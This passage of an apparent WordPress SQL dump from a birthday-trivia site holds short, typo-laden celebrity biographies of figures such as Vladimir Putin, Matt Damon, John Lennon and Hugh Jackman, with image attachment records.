immediately took over his chapter.\r\n\r\nHe completed his education at Andropov University and went to East Germany where he would remain from 1985 until 1990.\r\n\r\nThrough a mutual friend, Putin met Lyudmila Shkrebneva, a flight attendant on domestic airlines. The two became married on July 28, 1983 and would go on to have two daughters, Maria and Katerina, born 1985 and 1986 respectively.\r\n<h2>Career Accomplishments</h2>\r\n<img class=\"alignleft wp-image-344 size-medium\" title=\"Vladmir Putin\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Vladmir_Putin-234x300.jpg\" alt=\"Vladimir Putin birthday\" width=\"234\" height=\"300\" />After spending many years in school, Putin came to the conclusion that he wanted to work in intelligence. He made his way to the reception office of the <a href=\"https://en.wikipedia.org/wiki/KGB\" target=\"_blank\">KGB</a> Directorate, inquiring as to how he could become an intelligence officer. He was told that he would either need to serve in the army or obtain a law degree. At that moment he made the decision to join the law department at Leningrade State University.\r\n\r\nAdmitted to the law department in 1970, he passed with nearly flying colors and developed new goals. He began to see sports as a secondary priority, though he did continue to keep up with his athleticism.\r\n\r\nPutin graduated <a href=\"http://eng.spbu.ru/\" target=\"_blank\">Leningrad State University</a> and went on to work in the state security agencies. He was appointed to the Directorate secretariat, and then was sent to operations personnel retraining courses. After proving himself, he was sent for special training in Moscor for a year, and then worked with the First Main directorate in Leningrad.\r\n\r\nPutin eventually became the assistant to the rector of Leningrad State University, dealing with international regulations, and this would lead to his new political career in Moscow where he would move his entire family. Eventually, Putin would resign from the KGB and held many critical positions such as the Deputy Chief of Staff of the Presidential Executive Office. Additionally, he served as Secretary of the Security Council of the Russian Federation.\r\n\r\nThe world became more aware of Putin when he was given the appointment of Prime Minister in 1999, and in 2000, it was suggested that Vladimir become acting president. His true presidential election came on March 26, 2000, and he was elected to a second term on march 14, 2004. He was also appointed Prime Minister in 2008 via an executive order.\r\n<h2>Most Known For</h2>\r\nWhile he is most known for his presidency, Putin is also known for causing controversy when he invaded the <a href=\"http://www.worldaffairsjournal.org/article/ukraine-invasion-one-year-later\" target=\"_blank\">Ukraine</a> during their revolution.\r\n<h2>Current Personal Life</h2>\r\nThough Putin’s career is still moving forward, as expected, his marriage came to an end on June 6, 2013. The <a href=\"http://www.bbc.com/news/world-europe-22806866\" target=\"_blank\">divorce</a> was finalized in April 2014.\r\n<h2>Where Are They Now</h2>\r\nPutin still serves as president of Russia and is at the forefront of all things political. He is often considered to be one of the best leaders in the world, even if he is occasionally accused of being a dictator.\r\n\r\n[<a href=\"https://www.flickr.com/photos/worldeconomicforum/3234710388/sizes/l\" target=\"_blank\">Image 1</a>] [<a href=\"https://commons.wikimedia.org/wiki/File:Vladimir_Putin_official_portrait.jpg\" target=\"_blank\">Image 2</a>]\r\n<h2 style=\"text-align: center;\">Do you share Vladimir Putin\'s birthday?</h2>','Vladimir Putin','','publish','open','open','','vladimir-putin-birthday','','','2015-10-08 21:12:37','2015-10-08 21:12:37','',0,'http://birthdaypedia.com/?p=341',0,'post','',0),(342,2,'2015-10-08 08:54:11','2015-10-08 08:54:11','Actor Matt Damon was born in Cambridge on October 8, 1970 to a stock broker and an early childhood education professor. Friends with Ben Afflek, the two had an affinity for Dungeons and Dragons, sports, and movies. He has starred in a number of different films including the famous \"Saving Private Ryan\" in 1998.\r\n<h2>In the Beginning</h2>\r\nWhile America has been hotly debating the amount of money being spent retrieving Matt Damon from various situations, few remember his humble beginnings in <a href=\"http://www.imdb.com/title/tt0119217/\" target=\"_blank\">Good Will Hunting</a>. Those that do remember may not know that the story predates even that. Matthew Paige Damon was born October 8, 1970 in the town of Cambridge Massachusetts, his father a stock broker, and his mother an early childhood education professor.\r\n\r\nHis parents divorced while he was still young, but at the age of ten, he met a person that would influence his entire life: Ben Afflek. They lived just two blocks away from one another, and they would play baseball, Dungeons and Dragons, and even attend movies together. In addition to that, they both attended the Cambridge Rindge and Latin School together.\r\n<h2>Career Accomplishments</h2>\r\nMatt Damon studied at Harvard, majoring in English, but eventually left to pursue his acting career – not surprising considering the interest he showed in it during high school. He starred in some films that would go on to become very popular including <em>Good Will Hunting </em>and <em>The Rainmaker </em>both filmed in 1997. The former of the two film scored an Oscar for Best Original Screenplay.\r\n\r\nHe would later go on to star in popular films including:\r\n<ul>\r\n <li>Saving Private Ryan (1998)</li>\r\n <li>The Talented Mr. Ripley (1999)</li>\r\n <li>The Bourne Identity (2002)</li>\r\n <li>The Bourne Supremacy (2004)</li>\r\n <li>The Bourne Ultimatum (2007)</li>\r\n</ul>\r\nIt should be noted that the <a href=\"https://en.wikipedia.org/wiki/The_Bourne_Ultimatum_(film)\" target=\"_blank\">Bourne Ultimatum</a> had the largest August opening weekend in movie history, which should have been expected considering the buildup that the series has created over the years. ‘Ultimatum’ opened with an estimated $70.2 million in both the United States and Canada.\r\n\r\nDamon received the distinction of \"<a href=\"http://www.people.com/people/package/article/0,,20237714_20159958,00.html\" target=\"_blank\">Sexiest Man Alive</a>\" by People Magazine in 2007, and has appeared in a number of projects including a short music video with Sarah Silverman. Damon has received a number of awards including an Academy Award nomination for the role he played in <em>Invictus</em>, a movie detailing the struggle of Nelson Mandela after his release from prison.\r\n<h2>Most Known For</h2>\r\nDamon is most known and renowned for his role in the historical movie \"Saving Private Ryan\" in which he portrayed a soldier in the French theater during World War II. The movie received critical acclaim as well as viewer acclaim.\r\n<h2>Current Personal Life</h2>\r\n<img class=\"alignright wp-image-346 size-medium\" title=\"Matt Damon\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Matt_Damon-200x300.jpg\" alt=\"Matt Damon\" width=\"200\" height=\"300\" />\r\n\r\nDamon married his long time girlfriend <a href=\"http://marriage.about.com/od/entertainmen1/p/mattdamon.htm\" target=\"_blank\">Luciana Bozan Barroso</a> in December of 2005, the marriage took place in New York City Hall. Originally, she had been working as a bartender, and he met her while filming the movie \"Stuck on You\" in Miami. They currently have three daughters and live Miami. Additionally, he has one stepdaughter from a previous marriage.\r\n<h2>Where Are They Now</h2>\r\nDamon is working on a number of different high profile film projects. Previously he starred in \"We Bought a Zoo,\" and co-starred with John Krasinski in \"Promised Land.\" Additionally, he starred with Michael Douglas in \"Behind the Candelabra’ which was released in 2013. Damon has also starred in a number of science fiction movies including \"Elysium\" and \"The Zero Theorem\" in 2013. Later on he starred in yet another World War II film, \"The Monuments Men\" alongside fellow star <a href=\"http://birthdaypedia.com/george-clooney/\">George Clooney</a>.\r\n\r\nAlong with a number of other projects, Matt Damon starred in the recent thriller \"The Martian\" which is based upon a book by the same name. It details the struggle of a future astronaut mistakenly left behind on the red planet during an expedition gone wrong. This has led to the now popular joke that America has spent far too much money retrieving Matt Damon from less than ideal situations.\r\n\r\n[I<a href=\"https://www.flickr.com/photos/savethechildrenusa/4639544414/sizes/o/\" target=\"_blank\">mage 1</a>] [<a href=\"https://www.flickr.com/photos/flashback/1130362253/sizes/o/\" target=\"_blank\">Image 2</a>]\r\n\r\n ','Matt Damon','','publish','open','open','','matt-damon-birthday','','','2015-10-08 21:18:55','2015-10-08 21:18:55','',0,'http://birthdaypedia.com/?p=342',0,'post','',0),(343,2,'2015-10-08 14:03:39','2015-10-08 14:03:39','','Vladimir Putin','','inherit','open','closed','','vladmir-putin','','','2015-10-08 21:12:13','2015-10-08 21:12:13','',341,'http://birthdaypedia.com/wp-content/uploads/2015/10/Vladmir-Putin.jpg',0,'attachment','image/jpeg',0),(344,2,'2015-10-08 14:03:46','2015-10-08 14:03:46','','Vladmir_Putin','','inherit','open','closed','','vladmir_putin','','','2015-10-08 14:03:46','2015-10-08 14:03:46','',341,'http://birthdaypedia.com/wp-content/uploads/2015/10/Vladmir_Putin.jpg',0,'attachment','image/jpeg',0),(345,2,'2015-10-08 14:16:17','2015-10-08 14:16:17','','Matt Damon','','inherit','open','closed','','matt-damon','','','2015-10-08 14:16:17','2015-10-08 14:16:17','',342,'http://birthdaypedia.com/wp-content/uploads/2015/10/Matt-Damon.jpg',0,'attachment','image/jpeg',0),(346,2,'2015-10-08 14:16:23','2015-10-08 14:16:23','','OLYMPUS DIGITAL CAMERA','OLYMPUS DIGITAL CAMERA','inherit','open','closed','','olympus-digital-camera-2','','','2015-10-08 14:16:23','2015-10-08 14:16:23','',342,'http://birthdaypedia.com/wp-content/uploads/2015/10/Matt_Damon.jpg',0,'attachment','image/jpeg',0),(347,2,'2015-10-09 08:23:56','2015-10-09 08:23:56','Perhaps considered to be one of the most influential music artists of all time, John Lennon was born October 9, 1940. He was a major influence in the Beatles, and managed to launch a solo career that would change the face of popular music forever, across the entire world.\r\n<h3>In the Beginning</h3>\r\nMany legends are born in tragedy and many end in tragedy, but some still manage to leave their mark on the world, which John Lennon managed to do like no one before him. Some say he’s a dreamer, but he’s certainly not the only one. The miraculous birth took place on October 9, 1940 in Liverpool as German bombs rained down on the city. At the age of four, Lennon’s parents would separate, forcing him to live with his aunt. He rarely saw his son, but Lennon’s mother did visit regularly and taught him to play several instruments. Unfortunately she would die in a car accident in July of 1958, forever traumatizing and defining him.\r\n\r\nWhen Lennon was a child he was anything but exemplary. He was frequently in trouble for one reason or another, and it was believed that he would never accomplish anything in life. One teacher believed that he would do well in art school, but it seems he never quite took his artistic talent that far – he took it further.\r\n\r\nThe advent of Rock and Roll as introduced by greats like Elvis Presley and Buddy Holly were what insipired Lennon to create a band called Quarry Men, and he eventually met <a href=\"http://birthdaypedia.com/paul-mccartney/\">Paul McCartney</a> at a church event in 1957. He invited McCartney to join the group, and following that, they partnered with George Harrison and Stuart Sutcliffe. In 1960, they signed Pete Best to their band and proceeded to record a cover of Buddy Holly’s “That’ll be the Day” (The song that actually inspired the hit classic American Pie, but that’s another story for another biography). Once they finished that recording, they were quickly discovered by <a href=\"http://www.brianepstein.com/brian.html\" target=\"_blank\">Brian Epstein</a> and they began to perform at Liverpool’s Cavern Club regularly. Epstein helped them to land a record contract with EMI, and their new drummer, Ringo Starr helped them to rise to stardom, with their first single \"Love me Do\" reaching Number 17 on the charts. This, however, was only the beginning.\r\n<h3>Career Accomplishments</h3>\r\n<img class=\"alignright size-medium wp-image-350\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/John_Lennon-214x300.jpg\" alt=\"John_Lennon\" width=\"214\" height=\"300\" />There was a period of time in history known as Beatlemania, and during this time, the Beatles became the first British Band to become wildly popular in the United States. They made an appearance on The Ed Sullivan Show in 1964 and created their first film titled \"A Hard Day’s Night\" in 1964.\r\n\r\nA rather notable career accomplishment occurred for the Beatles and John Lennon of course, occurred when Queen Elizabeth II declared that the Beatles would be named members of the Order of the British Empire.\r\n\r\nBeatlemania was a great time, but it eventually died down, and the Beatles actually broke up. Lennon left the Beatles in 1969, following the completion of the \"<a href=\"http://www.thebeatles.com/album/abbey-road\" target=\"_blank\">Abbey Road</a>\" album.\r\n\r\nLennon began a solo career, releasing his debut album: John Lennon/Plastic Ono Band which was much different from many of his earlier offerings. Next, his song \"Imagine,\" became his greatest commercial success.\r\n\r\nDue to the stress related to issues with the Nixon Administration, Lennon and Yoko Ono separated in 1973, though they did get back together later on, and they gave birth one child, named Sean. During that time, Lennon decided to end his career and become more of a father to his son.\r\n\r\nWhen he returned to the music industry in 1980, he released the album \"Double Fantasy,\" but shortly after, he was shot in front of his hotel by Mark David Chapman. His death proved to be a tragedy of international proportions, and few artists have had the same impact on the music industry or culture in general.\r\n<h3>Most Known For</h3>\r\nLennon is most known for stating that the Beatles were \"more popular than Jesus,\" which led to the burning of Beatles albums in the streets of many US cities. He is also popular for his song: “Imagine” which is still popular to this day. “Imagine” was actually used as a cultural example on the popular science fiction show: \"Quantum Leap\" as a young Sam Beckett tries to convince his sister that he is in fact a time traveler.\r\n<h3></h3>\r\n<h3></h3>\r\n[<a href=\"https://www.flickr.com/photos/bswise_/5827072434/sizes/l\" target=\"_blank\">Image 1</a>] [<a href=\"https://www.flickr.com/photos/joan_thewlis/2741659409/sizes/o/\" target=\"_blank\">Image 2</a>]\r\n<h2 style=\"text-align: center;\">Do you share a birthday with John Lennon?</h2>\r\n<h2 style=\"text-align: center;\"></h2>','John Lennon (1940-1980)','','publish','open','open','','john-lennon-birthday','','','2015-10-15 15:20:20','2015-10-15 15:20:20','',0,'http://birthdaypedia.com/?p=347',0,'post','',0),(348,2,'2015-10-10 07:23:58','2015-10-10 07:23:58','Born October 10, 1973, Mario Lopez began his acting career on the popular Saturday morning show: Saved by the Bell. Once the popularity of that show fizzled out however, he would fade into obscurity until he was re-discovered on the popular dance show: Dancing with the Stars. From there, his career once again began to skyrocket.\r\n<h2>In the Beginning</h2>\r\nMario Lopez began his life on October 10, 1973, born in <a href=\"http://www.sandiego.gov/\" target=\"_blank\">San Diego</a>, and started his acting career at age ten. He appeared on a variety show called Kid’s Incorporated and would later appear as Slater in Saved by the Bell – a popular Saturday morning televisions series. It is difficult to describe how popular <a href=\"http://www.imdb.com/title/tt0096694/\" target=\"_blank\">Saved by the Bell</a> was, but we can say that Lopez appeared in both spinoffs, and then went on to star in the two made-for-TV movies. Eventually though, the popularity of the show declined, and Lopez drifted about, finding no real acting work anywhere.\r\n\r\nOf course he did appear on a few television shows and straight-to-video movies, the most memorable being his portrayal of Olympic swimmer Greg Louganis in 1997. Though it was a small role, it did receive a considerable amount of attention. This was the beginning of Lopez’s career, and it seemed as if he had bottomed out and may never actually act in a mainstream show again. In 1998 he met Ali Landry and married her in 2004, though a few weeks later, the marriage was annulled.\r\n<h2>Career Accomplishments</h2>\r\n<img class=\"alignleft wp-image-351 size-medium\" title=\"Mario Lopez\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Mario_Lopez-200x300.jpg\" alt=\"Mario Lopez\" width=\"200\" height=\"300\" />When child stars disappear or are brushed aside from their lead role, there is a strong chance that they will never be seen again. They tend to ride the euphoria for a time, but then find themselves sinking into obscurity, never to be seen again. You can see many different examples from popular culture. For example, Cody, from Step by Step, once a popular icon (who lived in a van) vanished once the show came to the end of its run. Since then he has been in and out of trouble with the law, and this story is not unique. That being said, there was a distinct possibility that Lopez would meet the same fate, but he proved to be far more resilient than the others, and eventually managed to take back the spotlight in force.\r\n\r\nLopez appeared on \"<a href=\"http://www.people.com/people/article/0,,1545936_20038845,00.html\" target=\"_blank\">Dancing with the Stars</a>\" in 2006 and he was named the \"runner up.\" It wasn’t long before he found himself on \"Extra\" serving as a correspondent, but was quickly promoted and took over the weekday episodes. Though he had been out of the spotlight for a considerable amount of time, he quickly rose to fame once again, even becoming People Magazine’s <a href=\"http://www.people.com/people/article/0,,20207497,00.html\" target=\"_blank\">Hottest Bachelor</a> in 2008.\r\n\r\nMario Lopez has become a household name, and even managed to make a Broadway debut in \"A Chorus Line\" in 2008. Additionally, he has released several books – a brief foray into the world outside of television. He has come back in a huge way, and it appears that he is here to stay, at least for now.\r\n<h2>Most Known For</h2>\r\nLopez is most known for his primary role on Saved by the Bell, the popular Saturday morning show that ran for several seasons, spawned two spinoffs, and a few television movies. It is said that the show influenced many lives, but it fizzled out fairly quickly, taking Lopez down with the ship temporarily. He is also known for his startling comeback, though there are many today who do not know of his role on Saved by the Bell simply because it has faded into obscurity.\r\n<h2>Current Personal Life</h2>\r\nLopez and his girlfriend, <a href=\"http://www.fabcouples.com/mario-lopezs-wife-courtney-laine-mazza/\" target=\"_blank\">Courtney Laine Mazza</a> conceived a child and gave birth do a daughter which they named Gia Francesca Lopez. In 2011, Lopez published another book inspired by his daughter.\r\n<h2>Where Are They Now</h2>\r\nLopez continues to act and raise his daughter while publishing books. He shows no signs of backing out of the acting game anytime soon.\r\n\r\n[<a href=\"https://www.flickr.com/photos/insidethemagic/6466256435/sizes/l\" target=\"_blank\">Image 1</a>] [<a href=\"https://www.flickr.com/photos/generalmills/6979928089/sizes/m/\" target=\"_blank\">Image 2</a>]\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Mario Lopez?</h2>\r\n ','Mario Lopez','','publish','open','open','','mario-lopez-birthday','','','2015-10-15 16:41:06','2015-10-15 16:41:06','',0,'http://birthdaypedia.com/?p=348',0,'post','',0),(349,2,'2015-10-08 14:43:34','2015-10-08 14:43:34','','John Lennon','','inherit','open','closed','','john-lennon','','','2015-10-08 14:43:34','2015-10-08 14:43:34','',347,'http://birthdaypedia.com/wp-content/uploads/2015/10/John-Lennon.jpg',0,'attachment','image/jpeg',0),(350,2,'2015-10-08 14:43:37','2015-10-08 14:43:37','','John_Lennon','','inherit','open','closed','','john_lennon','','','2015-10-08 14:43:37','2015-10-08 14:43:37','',347,'http://birthdaypedia.com/wp-content/uploads/2015/10/John_Lennon.jpg',0,'attachment','image/jpeg',0),(351,2,'2015-10-08 15:03:38','2015-10-08 15:03:38','','Mario_Lopez','','inherit','open','closed','','mario_lopez','','','2015-10-08 15:03:38','2015-10-08 15:03:38','',348,'http://birthdaypedia.com/wp-content/uploads/2015/10/Mario_Lopez.jpg',0,'attachment','image/jpeg',0),(352,2,'2015-10-08 15:03:52','2015-10-08 15:03:52','','Mario Lopez','','inherit','open','closed','','mario-lopez','','','2015-10-08 15:03:52','2015-10-08 15:03:52','',348,'http://birthdaypedia.com/wp-content/uploads/2015/10/Mario-Lopez.jpg',0,'attachment','image/jpeg',0),(355,2,'2015-10-08 18:20:53','2015-10-08 18:20:53','','Gwen Stefani','','inherit','open','closed','','gwen-stefani-birthday','','','2015-10-08 18:21:21','2015-10-08 18:21:21','',325,'http://birthdaypedia.com/wp-content/uploads/2015/10/gwen-stefani-birthday.jpg',0,'attachment','image/jpeg',0),(356,2,'2015-10-11 09:12:23','2015-10-11 09:12:23','Eleanor Roosevelt was the first lady to Franklin D. Roosevelt and an outspoken <a href=\"https://www.gwu.edu/~erpapers/teachinger/lesson-plans/notes-er-and-civil-rights.cfm\" target=\"_blank\">civil rights activist</a>. She is credited with paving the way for the women’s rights movement and revolutionized the way the First Lady is perceived in the White House. Additionally, she served with the United Nations and wrote a number of inspirational books.\r\n<h3>In the Beginning</h3>\r\n<img class=\"alignright wp-image-359\" title=\"Anna Eleanor Roosevelt\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Eleanor_Roosevelt-247x300.jpg\" alt=\"Anna Eleanor Roosevelt\" width=\"198\" height=\"240\" />Anna Eleanor Roosevelt was born on October 11, 1884 in the cultural capital of the United States: New York City. She was no stranger to government as she was the niece of then <a href=\"https://www.whitehouse.gov/1600/presidents/theodoreroosevelt\" target=\"_blank\">President Theodore Roosevelt</a>, a legend in his own right. One might be surprised to find that Eleanor was a rather shy child, especially given her outspoken nature later in life.\r\n\r\nHer mother died in 1892, and her father followed suit two years later. If not for being sent for education in England, Eleanor might never have become the outspoken, confident civil rights symbol that she was near the end of her life. Her experiences in England most definitely shaped her and changed the way she carried herself.\r\n\r\nThe 1900’s were the beginning of a new era with the introduction of automobiles by Henry Ford, and Eleanor herself began a new chapter by marrying her distant cousin, Franklin D. Roosevelt. They had six children: Franklin, James, Anna, Elliot, John, and Franklin Delano Junior. Unfortunately, Franklin died as an infant, but it did not deter the Roosevelts from leading a semi-normal home life. Eleanor became a public servant during the <a href=\"https://www.gwu.edu/~erpapers/teachinger/lesson-plans/notes-er-and-ww1.cfm\" target=\"_blank\">First World War</a> by pitching in at the American Red Cross – a vital service for the United States military.\r\n<h3>Career Accomplishments</h3>\r\n<img class=\"alignleft wp-image-358\" title=\"Eleanor Roosevelt\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Eleanor-Roosevelt-202x300.jpg\" alt=\"Eleanor Roosevelt\" width=\"177\" height=\"263\" />In 1921, things took a turn for the worse when Eleanor’s husband suffered from a polio attack, but she took the initiative and began to help bolster his political career. A little over a decade later, in 1933, Franklin was elected to the nation’s highest office, and Eleanor took the opportunity to redefine what the first lady should be capable of. She participated in a number of different activities including press conferences, and even helped the League of Women Voters. Additionally, she started a newspaper column titled: “My Day.\"\r\n\r\nWhile she would later be regarded as a pioneer in women’s civil rights, she was at the time regarded as a bit of a pariah, with many speaking out against the active role she had decided to take in her government. She was, however, one of the first public officials to use the mass media to bring attention to what would be considered important issues.\r\n\r\nLife became even more interesting for Eleanor following the death of her husband who unfortunately passed on April 12, 1945. At that time Eleanor had decided that her career in public service would come to an end, stating that the \"Story is over\" when she spoke to an interviewer. But from 1945 to 1953, she took up the position of delegate to the <a href=\"http://www.learnoutloud.com/Free-Audio-Video/History/World-History/Eleanor-Roosevelt-Address-to-the-United-Nations-General-Assembly/21339\" target=\"_blank\">UN General Assembly</a>. In addition to that she aided in the penning of the <a href=\"http://www.un.org/en/documents/udhr/history.shtml\" target=\"_blank\">Universal Declaration of Human Rights</a>.\r\n<h3>Most Known For</h3>\r\nEleanor is most known for her contribution to the civil rights movement before and after her husband’s presidency. In addition to that she published a number of books including ‘This is My Story’ in 1937 which spawned the now famous quote: \"No one can make you feel inferior without your consent’.\r\n\r\nShe was without a doubt one of the most outspoken women to reside at the White House, and was considered to be a great humanitarian. She is also one of the most memorable first ladies in history, paving the way for not only better civil rights, but also the women’s suffrage movement that ultimately gave women the same rights as men.\r\n<h3>Death</h3>\r\nEleanor Roosevelt succumbed to cancer in 1962, having aged seventy-eight years. She is buried at the home of Franklin D. Roosevelt, a national historic site located in Hyde Park, New York.\r\n\r\n[<a href=\"https://www.flickr.com/photos/kubina/143733435/sizes/l\" target=\"_blank\">Image 1</a>] [<a href=\"https://en.wikiquote.org/wiki/File:Eleanor_Roosevelt_portrait_1933.jpg\" target=\"_blank\">Image 2</a>] [<a href=\"https://en.wikipedia.org/wiki/File:Eleanor_Roosevelt_cph.3b16000.jpg\" target=\"_blank\">Image 3</a>]\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Eleanor Roosevelt?</h2>','Anna Eleanor Roosevelt (1884 – 1962)','','publish','open','open','','anna-eleanor-roosevelt-birthday','','','2015-10-15 20:58:45','2015-10-15 20:58:45','',0,'http://birthdaypedia.com/?p=356',0,'post','',0),(357,2,'2015-10-08 19:40:44','2015-10-08 19:40:44','','EleanorRoosevelt','','inherit','open','closed','','eleanorroosevelt','','','2015-10-08 19:40:44','2015-10-08 19:40:44','',356,'http://birthdaypedia.com/wp-content/uploads/2015/10/EleanorRoosevelt.jpg',0,'attachment','image/jpeg',0),(358,2,'2015-10-08 19:40:46','2015-10-08 19:40:46','','Eleanor Roosevelt','','inherit','open','closed','','eleanor-roosevelt','','','2015-10-08 19:40:46','2015-10-08 19:40:46','',356,'http://birthdaypedia.com/wp-content/uploads/2015/10/Eleanor-Roosevelt.jpg',0,'attachment','image/jpeg',0),(359,2,'2015-10-08 19:40:49','2015-10-08 19:40:49','','Eleanor_Roosevelt','','inherit','open','closed','','eleanor_roosevelt','','','2015-10-08 19:40:49','2015-10-08 19:40:49','',356,'http://birthdaypedia.com/wp-content/uploads/2015/10/Eleanor_Roosevelt.jpg',0,'attachment','image/jpeg',0),(361,2,'2015-10-12 09:22:53','2015-10-12 09:22:53','Hugh Jackman is perhaps one of the most beloved stars to ever play the role of Wolverine in the X-Men movie franchise. Everyone knows him for the role, but what about behind the scenes? How did such a talented actor get started in show business?\r\n<h2>In the Beginning</h2>\r\nHugh Jackman was born on October 12, 1968 in <a href=\"http://www.australia.com/en/places/sydney.html\" target=\"_blank\">Sydney, Australia</a>. He is the youngest out of five children. He was only eight years old when his mother left. Leaving him and his siblings to be raised by their father. Growing up, Hugh Jackman attended Knox Gramma School. Enrolling in the University of Technology, Sydney later on. He graduated with a journalism major and a communications degree.\r\n\r\nHugh Jackman did not get his start in professional acting until he began to perform in a couple of Melbourne musicals. He entered the international scene soon after, and earned critical praise for his performance of the character Curly in <em>Oklahoma!</em> While in London. In New York City, he also received praise for his role as Billy Bigelo in <em><a href=\"http://www.firstshowing.net/2006/hugh-jackman-updates-carousel-remake/\" target=\"_blank\">Carousel</a></em>.\r\n<h2>Career Accomplishments</h2>\r\nHugh Jackman has received a lot of praise and recognition for the roles he has played throughout his career. He won the Tony Award for the role he played as Peter Allen for <em>The Boy from OZ</em>. He has also received international recognition for his role as the superhero Wolverine for the X-Men film series. In 2008, he was named “Sexiest Man Alive” by <em>People</em> magazine. He also won an Emmy Award when he was the host for the 2005 Tony Awards.\r\n\r\nHe received a <a href=\"https://en.wikipedia.org/wiki/Golden_Globe_Award_for_Best_Actor_%E2%80%93_Motion_Picture_Musical_or_Comedy\" target=\"_blank\">Gold Glove Award for Best Actor</a> in a musical or comedy for the role he played in <em>Les Miserables</em>. In 2013, Hugh Jackman was nominated for an Academy award of Best Actor. On December 13, 2012 he received honor as star on the Hollywood Walk of Fame.\r\n<h2>Most Known For</h2>\r\n<img class=\"alignright wp-image-363 size-medium\" title=\"Hugh Jackman\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Hugh_Jackman-219x300.jpg\" alt=\"Hugh Jackman\" width=\"219\" height=\"300\" />While Hugh Jackman is known for roles his played in other films such as <em>Les Miserables</em>,<em> Kate & Leopold</em>, <em>Australia</em>, <em>Van Helsing</em>, and <em>The Prestige</em>. He is most known for the role he has played as the character Wolverine from the X-Men film series. Even though he has walked away from the <a href=\"http://xmenmovies.wikia.com/wiki/Hugh_Jackman\" target=\"_blank\">Wolverine</a> role after over a decade of playing the character. Many fans still recognize him as the lone wolf Canadian character.\r\n<h2>Current Personal Life</h2>\r\nHugh Jackman married actress <a href=\"https://en.wikipedia.org/wiki/Deborra-Lee_Furness\" target=\"_blank\">Deborra-Lee Furness</a> in 1996. They currently live in Melbourne, Australia. He has two adopted children too, Ava Eliot and Oscar Maximilian. He met his wife when they were making an Australian television show called <em>Correli</em> in 1995.\r\n<h2>Where Are They Now?</h2>\r\nHugh Jackman has continued in his acting career. Not all of the films have done very well though. He played a light role in the film <em>Movie 43</em> in 2013. The film did badly in the box office, and was highly criticized upon with its release despite a few big names attached to the film.\r\n\r\nHugh Jackman has even continued his role as the infamous Wolverine in recent years too. He played the character in the film <em>The Wolverine</em> in 2013, and the newest addition the X-Men film franchise <em>X-Men: Days of Future Past</em> in 2014. In 2014 he hosted the Tony Awards as well.\r\n\r\nThe latest movie Hugh Jackman has played is the role of Blackbeard in the fantasy movie <em>Pan</em>. The movie is inspired strongly by Peter Pan, and is set to be released soon.\r\n\r\n[<a href=\"https://www.flickr.com/photos/gageskidmore/9358550920/sizes/l\" target=\"_blank\">Image 1</a>] [<a href=\"https://www.flickr.com/photos/max-tim-tom/2839022660/sizes/o/\" target=\"_blank\">Image 2</a>]\r\n<h2 style=\"text-align: center;\">Do you share a birthday with Hugh Jackman?</h2>','Hugh Jackman','','publish','open','open','','hugh-jackman-birthday','','','2015-10-15 21:42:57','2015-10-15 21:42:57','',0,'http://birthdaypedia.com/?p=361',0,'post','',0),(362,2,'2015-10-09 15:31:26','2015-10-09 15:31:26','','Hugh Jackman birthday','','inherit','open','closed','','hugh-jackman','','','2015-10-15 21:42:53','2015-10-15 21:42:53','',361,'http://birthdaypedia.com/wp-content/uploads/2015/10/Hugh-Jackman.jpg',0,'attachment','image/jpeg',0),(363,2,'2015-10-09 15:31:32','2015-10-09 15:31:32','','Hugh_Jackman','','inherit','open','closed','','hugh_jackman','','','2015-10-09 15:31:32','2015-10-09 15:31:32','',361,'http://birthdaypedia.com/wp-content/uploads/2015/10/Hugh_Jackman.jpg',0,'attachment','image/jpeg',0),(366,2,'2015-10-13 08:16:52','2015-10-13 08:16:52','Paul Simon is one of the most amazing songwriters and singer of his time. He\'s been an influential figure for the American rock music scene. Some of his best work comes from pairing up with <a href=\"http://www.simonandgarfunkel.com/us/home\" target=\"_blank\">Simon & Garfunkel</a>. Despite his age, Paul Simon has continued to see success for his long running career as a musician.\r\n<h3>In The Beginning:</h3>\r\nPaul Simon born on October 13, 1941 in <a href=\"http://www.state.nj.us/\" target=\"_blank\">New Jersey</a>. His parents were Jewish American, and encouraged his talent for music from a young age. His father, Louis, worked as a bandleader and a teacher. His mother, Belle, worked as an English teacher too. Later on in life this helped Paul Simon quite a bit, since he\'s well known for his well written compositions.\r\n\r\nAt a young age, Paul Simon moved to Queens, New York. He met Art Garfunkel and the two became fast friends. At the time, Garfunkel was known as “the most famous singer in the neighborhood.”\r\n\r\nDuring their time in Forest Hill High School, Garfunkel and Simon formed their own duo for a while they called “Tom and Jerry.\" They performed from time to time at school dances. The duo even pooled together $7 so they could perform the track “Hey Schoolgirl” in 1957. It earned them enough success to have a chance to perform on American Bandstand, but they decided to separate instead when they attended college. They failed to produce a follow up to their previous success, but this hardly stopped Paul Simon from pressing forward with a successful music career.\r\n<h3>Career Accomplishments:</h3>\r\nPaul Simon has won quite a few <a href=\"http://www.paulsimon.com/us/awardsachievements\" target=\"_blank\">awards</a> over the course of his musical career. He has won 13 Grammy Awards so far. He has also won the Life Achievement Award. <em>Time</em> magazine even named Paul Simon as one of the “100 People Who Shaped the World” in 2006.\r\n<h3>Most Known For:</h3>\r\n<img class=\"alignright wp-image-369 size-medium\" title=\"Paul Simon\" src=\"http://birthdaypedia.com/wp-content/uploads/2015/10/Paul_Simon-225x300.jpg\" alt=\"Paul Simon\" width=\"225\" height=\"300\" />Paul Simon is unique in the fact his style tends to vary and change. Over the course of his career he and Garfunkel have come together to produce together. In the 1980s, he released <em>Graceland</em>, which is based off of Brazilian and African music. It was an unlikely hit for its time. In 1966, he and Garfunkel released an album called <em>Sounds of Silence</em>. The album was a hit, and later they even collaborated on the soundtrack for <em>The Graduate</em> in 1967.\r\n<h3>Current Personal Life:</h3>\r\nSimon married the singer Edie Brickell in 1992. She is his third wife, and they had three children together. In 2001 and 2007, Paul Simon was inducted into the <a href=\"https://rockhall.com/exhibits/paul-simon-words-and-music-exhibit-rock-hall/\" target=\"_blank\">Rock and Roll Hall of Fame</a>. He even became the first recipient for the Library of Congress\' Gershwin Prize for Popular Song.\r\n<h3>Where Are They Now:</h3>\r\nPaul Simon has been involved with philanthropic work in recent years. He\'s the co-founder for The 